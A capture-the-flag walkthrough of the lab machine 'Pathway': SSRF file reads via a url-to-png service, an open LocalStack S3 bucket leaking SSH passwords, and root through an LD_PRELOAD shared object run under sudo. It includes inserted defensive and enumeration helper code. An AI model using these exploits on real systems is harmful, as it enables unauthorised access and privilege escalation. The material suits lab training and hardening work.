Pathway
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.210.230 --open
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-04 19:50 UTC
Nmap scan report for 192.168.210.230
Host is up, received echo-reply ttl 61 (0.15s latency).
Scanned at 2025-11-04 19:50:43 UTC for 152s
Not shown: 65520 closed tcp ports (reset), 11 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 fc:72:06:8f:ef:ec:9b:87:f3:95:ca:f2:e7:1f:ea:dc (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFyksaWzSNfPbN6T3ts7+fGJ0/9aIXrN7HimSzjO+W6pfa1Qq4QZb/hnkglJwvjgcTOQiraq2M9EQ9JtbRC1ROY=
| 256 42:c2:f0:fd:85:f6:93:cb:bd:a0:e8:ed:c1:a2:6d:60 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHbDRRUQ2YifMbadcFEg6fdgQ2bcGEHcQyrud/UFwLiy
80/tcp open http syn-ack ttl 61 nginx 1.22.1
|_http-title: Chain App Dev
|_http-server-header: nginx/1.22.1
| http-methods:
|_ Supported Methods: GET HEAD POST
3089/tcp open ptk-alink? syn-ack ttl 61
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
| HTTP/1.1 400 Bad Request
| Connection: close
| FourOhFourRequest:
| HTTP/1.1 400 Bad Request
| content-type: text/plain; charset=UTF-8
| Date: Tue, 04 Nov 2025 19:51:22 GMT
| Connection: close
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad Request
| content-type: text/plain; charset=UTF-8
| Date: Tue, 04 Nov 2025 19:51:18 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| content-type: text/plain; charset=UTF-8
| Date: Tue, 04 Nov 2025 19:51:19 GMT
|_ Connection: close
4566/tcp open http syn-ack ttl 60 TwistedWeb httpd 24.3.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: TwistedWeb/24.3.0
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
<snipped>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
<snipped>
We have SSH open on port 22, HTTP on port 80, and two other open ports, 3089 and 4566. Port 3089 answers every probe with an HTTP 400, so it is an HTTP service as well. Note also the TTL: 61 for the first three ports but 60 for 4566, so that service is one hop further away, which usually means it is running in a container on the host.
SSH (22):
Since we do not have any credentials yet, we will skip SSH for the moment.
HTTP (80):

On port 80 there is only a static page with no further functionality.
? (3089):

It asks for a url parameter, so let's set it to an arbitrary value and see how we can play with this.

Here we identified a server-side request forgery (SSRF) vulnerability: the service fetches whatever URL we supply and renders it as an image.
Check other schemes as well, such as file://, to see whether we can read local files through it:

There is a publicly documented SSRF vulnerability in an application called url-to-png, which is most likely what we are dealing with here.
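As an added example (my own code, not from this writeup and not from url-to-png), here is the unsafe pattern the service on port 3089 exhibits next to an allowlist check that would have refused every payload used above: file://, the nested view-source:file:// form, localhost and the other loopback spellings. It assumes the service takes a url parameter and fetches it; the function names, the stub DNS table and the sample targets are mine.

```python
"""Added example, not from the original writeup or from url-to-png.

An SSRF sink fetches a client-supplied URL as-is. The hardened version
below allows only http(s), rejects userinfo, resolves the host and refuses
any address that is not globally routable (loopback, RFC 1918, link-local
such as 169.254.169.254, IPv4-mapped IPv6, ...). All function names and
the sample targets are assumptions for illustration.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def unsafe_render_target(url):
    """The vulnerable pattern: whatever the client sends is fetched/rendered."""
    return url


def resolve_host(host):
    """Return every address `host` resolves to (wrapped so tests can stub DNS)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(text):
    """True only for globally routable addresses; unwraps ::ffff:a.b.c.d first."""
    ip = ipaddress.ip_address(text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global


def validate_render_target(url, resolver=resolve_host):
    """Return (ok, reason). Decide before any fetch happens."""
    parts = urlsplit(url.strip())
    # view-source:file:///... parses as scheme 'view-source', so this check
    # also stops the nested-scheme trick used above.
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme or '<none>'}"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addresses = [str(ipaddress.ip_address(host))]  # literal IP, no DNS needed
    except ValueError:
        try:
            addresses = resolver(host)                   # hostname: resolve it
        except OSError:                                  # socket.gaierror is an OSError
            return False, f"unresolvable host: {host}"
    for address in addresses:
        if not is_public_address(address):
            return False, f"{host} resolves to non-public address {address}"
    # Caveat: to defeat DNS rebinding, connect to one of `addresses` rather
    # than resolving the name a second time at fetch time.
    return True, "ok"
```

Decimal or hex IP spellings such as http://2130706433/ are not accepted by ipaddress, so they fall through to the resolver; a real getaddrinfo turns them into 127.0.0.1 and the address check rejects them.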

I stopped enumerating this port because I did not find anything useful.
? (4566):

Just a blank page.
If we directory-bust it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ gobuster dir -u http://192.168.210.230:4566/ -w /usr/share/wordlists/dirb/common.txt -t 40
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.210.230:4566/
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/internal (Status: 200) [Size: 626]
Progress: 4613 / 4613 (100.00%)
===============================================================
Finished
===============================================================
Let's navigate to that directory:

Here we have an S3 bucket named internal with a single object in it, users.json. Port 4566 with a TwistedWeb banner is the default port of LocalStack, a local AWS emulator, and the bucket can be listed without any credentials.
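What the browser shows at /internal is an S3 ListBucketResult XML document. As an added example (my own code, not from this writeup and not from LocalStack), here is a standard-library-only walker for that format: it parses a listing, follows continuation tokens, builds path-style object URLs and triages keys that look worth fetching first. The embedded XML is constructed to mirror the single object seen here; endpoint and bucket names are parameters, and only list_bucket() touches the network.

```python
"""Added example, not from the original writeup or from LocalStack: walk an
S3-compatible bucket listing (ListBucketResult XML) using only the standard
library. SAMPLE_LISTING is constructed to mirror the one object seen in the
`internal` bucket; endpoint/bucket names are parameters, and list_bucket()
is the only function that talks to the network.
"""
import urllib.request
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from urllib.parse import quote, urlencode

S3_NS = "{http://s3.amazonaws.com/doc/2006-03-01/}"

# Constructed listing; key, size and timestamp match the `aws s3 ls` output.
SAMPLE_LISTING = """<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>internal</Name>
  <Prefix></Prefix>
  <KeyCount>1</KeyCount>
  <MaxKeys>1000</MaxKeys>
  <IsTruncated>false</IsTruncated>
  <Contents>
    <Key>users.json</Key>
    <LastModified>2025-11-04T19:51:54.000Z</LastModified>
    <Size>381</Size>
    <StorageClass>STANDARD</StorageClass>
  </Contents>
</ListBucketResult>
"""

# Key patterns worth pulling first during enumeration.
INTERESTING_SUFFIXES = (".json", ".env", ".pem", ".key", ".sql", ".bak", ".tfstate", ".yml", ".yaml")
INTERESTING_WORDS = ("credential", "secret", "password", "backup", "config")


@dataclass
class S3Object:
    key: str
    size: int
    last_modified: str


def parse_listing(xml_text):
    """Return (bucket, objects, next_continuation_token or None)."""
    root = ET.fromstring(xml_text)
    if root.tag != S3_NS + "ListBucketResult":
        raise ValueError(f"not a ListBucketResult: {root.tag}")
    bucket = root.findtext(S3_NS + "Name")
    objects = [
        S3Object(
            key=c.findtext(S3_NS + "Key"),
            size=int(c.findtext(S3_NS + "Size") or 0),
            last_modified=c.findtext(S3_NS + "LastModified") or "",
        )
        for c in root.iter(S3_NS + "Contents")
    ]
    truncated = (root.findtext(S3_NS + "IsTruncated") or "false").lower() == "true"
    token = root.findtext(S3_NS + "NextContinuationToken") if truncated else None
    return bucket, objects, token


def object_url(endpoint, bucket, key):
    """Path-style URL, the addressing the browser visit to /internal used."""
    return f"{endpoint.rstrip('/')}/{bucket}/{quote(key, safe='/')}"


def triage(objects):
    """Keys that look like credentials or config, most likely to pay off first."""
    hits = []
    for o in objects:
        k = o.key.lower()
        if k.endswith(INTERESTING_SUFFIXES) or any(w in k for w in INTERESTING_WORDS):
            hits.append(o.key)
    return hits


def list_bucket(endpoint, bucket, timeout=10):
    """Unauthenticated ListObjectsV2 over plain HTTP, following continuation
    tokens until the listing is complete. Network-only; not run offline."""
    objects, token = [], None
    while True:
        params = {"list-type": "2"}
        if token:
            params["continuation-token"] = token
        url = f"{endpoint.rstrip('/')}/{bucket}/?{urlencode(params)}"
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            _, page, token = parse_listing(resp.read())
        objects.extend(page)
        if not token:
            return objects
```

A real bucket with more than 1000 keys returns IsTruncated=true and a NextContinuationToken; the loop in list_bucket() keeps requesting pages until that stops, which a single browser visit never does.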
Open users.json:

That gives us credentials for two users.
Let's check whether they are valid:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ nxc ssh 192.168.210.230 -u brian -p T@k9B#LmX2^VzJ6p
SSH 192.168.210.230 22 192.168.210.230 [*] SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u5
SSH 192.168.210.230 22 192.168.210.230 [+] brian:T@k9B#LmX2^VzJ6p Linux - Shell access!
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ nxc ssh 192.168.210.230 -u huzaid -p 'M4&dX-Yq7Nz#5RbC'
SSH 192.168.210.230 22 192.168.210.230 [*] SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u5
SSH 192.168.210.230 22 192.168.210.230 [+] huzaid:M4&dX-Yq7Nz#5RbC Linux - Shell access!
Both are valid.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ ssh brian@192.168.210.230
The authenticity of host '192.168.210.230 (192.168.210.230)' can't be established.
ED25519 key fingerprint is SHA256:DklQpxrLtoaufgj7p+2aDA6cAHCcLgqzj6qfqHm1nHw.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:30: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.210.230' (ED25519) to the list of known hosts.
brian@192.168.210.230's password:
Linux pathway 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
brian@pathway:~$
Post-Exploitation:
The first thing to check in local enumeration is what we can run with sudo:
brian@pathway:~$ sudo -l
Matching Defaults entries for brian on pathway:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty, env_keep+=LD_PRELOAD
User brian may run the following commands on pathway:
(ALL) NOPASSWD: /usr/bin/ping
LD_PRELOAD survives sudo's environment sanitisation because of the env_keep+=LD_PRELOAD entry in the Defaults (sudo normally drops LD_* variables). Since sudo runs /usr/bin/ping with real and effective uid 0, the dynamic loader is not in secure-execution mode and will load whatever library we name, so we can inject a shared object into a root process. The NOPASSWD rule for ping only makes it silent; any dynamically linked command in the rule would do.
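As an added example (my own code, not from this writeup), here is a small checker that parses sudo -l output of the form shown above and flags an env_keep entry for a loader variable together with the commands the user may run, which is the combination that makes this escalation possible. It runs over the exact output above, embedded as a string; the function and class names are mine.

```python
"""Added example, not from the original writeup: parse `sudo -l` output and
flag loader variables that sudo keeps (env_keep) together with the commands
the user may run. Function and class names are my own; SAMPLE_SUDO_L is the
output shown above, embedded so the check runs offline.
"""
import re
from dataclasses import dataclass, field

# Variables the dynamic loader honours for any dynamically linked program.
# sudo drops them by default; env_keep re-adds them.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

SAMPLE_SUDO_L = r"""
Matching Defaults entries for brian on pathway:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty, env_keep+=LD_PRELOAD

User brian may run the following commands on pathway:
    (ALL) NOPASSWD: /usr/bin/ping
""".strip("\n")

# "(runas) TAG: TAG: command[, command...]"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<commands>.+)$")
# env_keep+=LD_PRELOAD  or  env_keep+="LD_PRELOAD LD_LIBRARY_PATH"
ENV_KEEP_RE = re.compile(r'^env_keep\s*\+?=\s*"?(?P<vars>[^"]+)"?$')


@dataclass
class SudoRule:
    runas: str
    tags: list
    command: str


@dataclass
class SudoPolicy:
    defaults: list = field(default_factory=list)
    rules: list = field(default_factory=list)


def parse_sudo_l(text):
    """Split `sudo -l` output into Defaults tokens and command rules."""
    policy = SudoPolicy()
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Matching Defaults entries"):
            section = "defaults"
            continue
        if line.startswith("User ") and "may run" in line:
            section = "rules"
            continue
        if section == "defaults":
            # secure_path uses '\:' as its separator, so splitting on ',' is safe
            policy.defaults.extend(t.strip() for t in line.split(",") if t.strip())
        elif section == "rules":
            m = RULE_RE.match(line)
            if not m:
                continue
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            for cmd in m.group("commands").split(","):
                policy.rules.append(SudoRule(m.group("runas").strip(), tags, cmd.strip()))
    return policy


def kept_loader_vars(policy):
    """Loader variables that an env_keep Default preserves."""
    kept = set()
    for token in policy.defaults:
        m = ENV_KEEP_RE.match(token)
        if m:
            kept.update(m.group("vars").split())
    return sorted(kept & LOADER_VARS)


def ld_injection_findings(policy):
    """One finding per rule when a loader variable is kept: every dynamically
    linked command in the rule lets the caller load their own library as runas."""
    kept = kept_loader_vars(policy)
    if not kept:
        return []
    findings = []
    for rule in policy.rules:
        silent = "NOPASSWD" in rule.tags
        findings.append(
            f"{rule.command} runs as ({rule.runas}) with {', '.join(kept)} kept"
            + (" and no password prompt" if silent else "")
        )
    return findings


if __name__ == "__main__":
    for finding in ld_injection_findings(parse_sudo_l(SAMPLE_SUDO_L)):
        print(finding)
```

The same parse is useful from the defensive side: run it over `sudo -l -U <user>` for every account and any non-empty finding list is a sudoers entry to fix, regardless of how harmless the listed command looks.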
First we create a shared object, then pass it in LD_PRELOAD when invoking sudo:
brian@pathway:~$ cat exploit.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* declares setuid/setgid; without it gcc only warns about implicit declarations */

/* With -nostartfiles there is no crt code, so our _init is what the loader
 * runs when it maps the library, i.e. before ping's main(). */
void _init() {
    /* Drop the variable first so the spawned bash and its children do not
     * load this library again and fork shells recursively. */
    unsetenv("LD_PRELOAD");
    /* sudo already runs us as root; make the ids explicit for the shell. */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
brian@pathway:~$ gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles
brian@pathway:~$ ls
exploit.c exploit.so local.txt
Now we can use this to get root access:
brian@pathway:~$ sudo LD_PRELOAD=/home/brian/exploit.so /usr/bin/ping
root@pathway:/home/brian#
Get the flags:
root@pathway:/home/brian# cat local.txt
f28dc69735cf0340918ca803f67a29b0
root@pathway:/home/brian# cat /root/proof.txt
893abbf5118bc8e3865b742a46fe72d0
After I solved the box, I found this was not the intended way to get initial access.
The intended route is to read the .env file of url-to-png-2.0.2 through the file:// SSRF on port 3089 (the object view-sourcefileopturl-to-png-202env_width-4000.png in the bucket listing below is the render of view-source:file:///opt/url-to-png-2.0.2/.env) to obtain AWS credentials:

Pull the access key ID and secret access key from the rendered image and configure an AWS CLI profile with them, so we can talk to the emulated services if the keys are accepted:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ aws configure --profile=Pathway
AWS Access Key ID [None]: AKIA7826a5d1963a4e6b
AWS Secret Access Key [None]: jIOzrNK0FXBeafVXQvXqDh1pS8frf0QqIS3BsN1OjAI
Default region name [None]: us-east-1
Default output format [None]: jsonWithin aws cli we can view who we are using this subcommand sts get-caller-identity:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ aws sts get-caller-identity --profile Pathway --endpoint-url http://192.168.210.230:4566
{
"UserId": "AKIAIOSFODNN7EXAMPLE",
"Account": "000000000000",
"Arn": "arn:aws:iam::000000000000:root"
}
The ARN arn:aws:iam::000000000000:root is the account root identity rather than an IAM user, and account 000000000000 together with UserId AKIAIOSFODNN7EXAMPLE are LocalStack's built-in defaults. In its default configuration LocalStack does not validate access keys against a real IAM, so the credentials from .env mainly confirm which endpoint to use rather than grant a specific permission set.
Now let's list the bucket named internal:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ aws s3 ls s3://internal --profile Pathway --endpoint-url http://192.168.210.230:4566
2025-11-04 19:54:28 15364 11-4-2025.fileetcpasswd.png
2025-11-04 20:06:12 447681 11-4-2025.fileetcpasswd_width-4000.png
2025-11-04 20:01:22 2747 11-4-2025.httplocalhost.png
2025-11-04 20:02:54 2221 11-4-2025.httplocalhost3089.png
2025-11-04 20:03:14 41904 11-4-2025.httplocalhost3089_width-4000.png
2025-11-04 20:02:50 762 11-4-2025.httplocalhost4566.png
2025-11-04 20:02:46 2747 11-4-2025.httplocalhost80.png
2025-11-04 19:55:12 836872 11-4-2025.view-sourcefile_width-4000.png
2025-11-04 19:54:56 16083 11-4-2025.view-sourcefileetcpasswd.png
2025-11-04 19:55:33 470414 11-4-2025.view-sourcefileetcpasswd_width-4000.png
2025-11-04 19:55:58 70017 11-4-2025.view-sourcefilehomehuzaidawscredentials_width-4000.png
2025-11-04 20:26:06 732792 11-4-2025.view-sourcefileopturl-to-png-202env_width-4000.png
2025-11-04 19:56:38 21703 11-4-2025.view-sourcefileprocselfenviron_width-4000.png
2025-11-04 19:51:54 381 users.json
The bucket is full of PNGs, which are the screenshots url-to-png rendered for our earlier SSRF requests (file:///etc/passwd, view-source:file:///home/huzaid/.aws/credentials, the .env file, http://localhost:4566 and so on), but what we are most interested in is the users.json file we saw earlier.
We can copy it to our machine with the s3 cp subcommand:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ aws s3 cp s3://internal/users.json . --profile Pathway --endpoint-url http://192.168.210.230:4566
download: s3://internal/users.json to ./users.json
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ ls
nmap users.json
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pathway]
└─$ cat users.json
[
{
"full name": "Brian Stove",
"username": "brian",
"role": "IT admin",
"email": "alsina@mailtech.offsec",
"password": "T@k9B#LmX2^VzJ6p"
},
{
"full name": "Huzaid Doodo",
"username": "huzaid",
"role": "Helpdesk",
"email": "huzaid@mailtech.offsec",
"password": "M4&dX-Yq7Nz#5RbC"
}
]
We get the same credentials, and from here the privilege escalation proceeds exactly as above.